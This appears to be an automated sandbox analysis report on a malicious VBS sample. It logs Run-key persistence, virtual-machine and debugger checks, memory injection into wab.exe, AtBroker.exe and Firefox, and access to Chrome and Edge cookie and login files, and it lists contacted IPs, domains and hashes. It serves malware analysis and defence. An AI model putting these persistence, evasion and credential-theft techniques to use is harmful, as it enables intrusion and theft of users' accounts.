Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTX			Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5813	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4033	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5901	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3912	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 0.4 %
Source: C:\Windows\SysWOW64\AtBroker.exe	API coverage: 3.3 %

Source: C:\Windows\System32\wscript.exe TID: 5836	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1268	Thread sleep count: 5901 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076	Thread sleep count: 3912 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: downHyper-V Time Synchronization
Source: wscript.exe, 00000000.00000002.2051065682.000001B66AF65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`#{
Source: wscript.exe, 00000000.00000002.2051065682.000001B66AF65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2048842064.000001B66CF93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.2051850283.000001B66CF95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000002.00000002.2786911923.000001CB71841000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: wscript.exe, 00000000.00000003.2048272066.000001B66CD87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemALFONS-PCvmicvss
Source: wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: evmicheartbeatHyper-
Source: wscript.exe, 00000000.00000003.2048272066.000001B66CD87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: wscript.exe, 00000000.00000003.2025331654.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026077213.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051632922.000001B66CDF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049654599.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051485295.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025261904.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048239557.000001B66CDEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024942075.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2709804128.0000000006A42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049841060.000001B66CF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ing ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service Interface
Source: wab.exe, 00000008.00000003.2770573941.0000000006A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW h
Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: erVirtual DiskHyper-V Guest Service Inte
Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: viceHyper-V PowerShell Direct Se.hM
Source: wab.exe, 00000008.00000003.2709804128.0000000006A42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2806420134.0000000006A42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtSetInformationThread: Direct from: 0x76EF2ECC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtUnmapViewOfSection: Direct from: 0x76EF2D3C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EE0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EAF958			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Windows Analysis Report FTG_PD_04024024001.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
FTG_PD_04024024001.vbs

Malware Threat Intel
Provided by

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.121.105.163	unknown	Bulgaria		43561	NET1-ASBG	false
47.91.88.207	www.tyaer.com	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
www.oyoing.com	127.0.0.1	true
www.tyaer.com	47.91.88.207	true
www.megabet303.lol	unknown	unknown

ID:	1431505
Product:	CloudBasic
Start time:	11:02:05
Start date:	25.04.2024
Sample:	FTG_PD_04024024001.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0d167ef616c14b868472f78d1195fdf3
SHA1:	d203ebbb35564dd406590d84b4c73cf310104634
SHA256:	6c4ed597f8ac1bf79f88afe6704c467c3629247824efb12ab35a72fd52176e84

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	3B5F16AF7CBA1AB2C735F98B8CA95996	E8DABC4D27272134AC684E63A2C3333A49FDAD0B	28A3E10D86C5F104FFDBB27A6F39B34A926D3542D1064CC39C7E5AC086583803
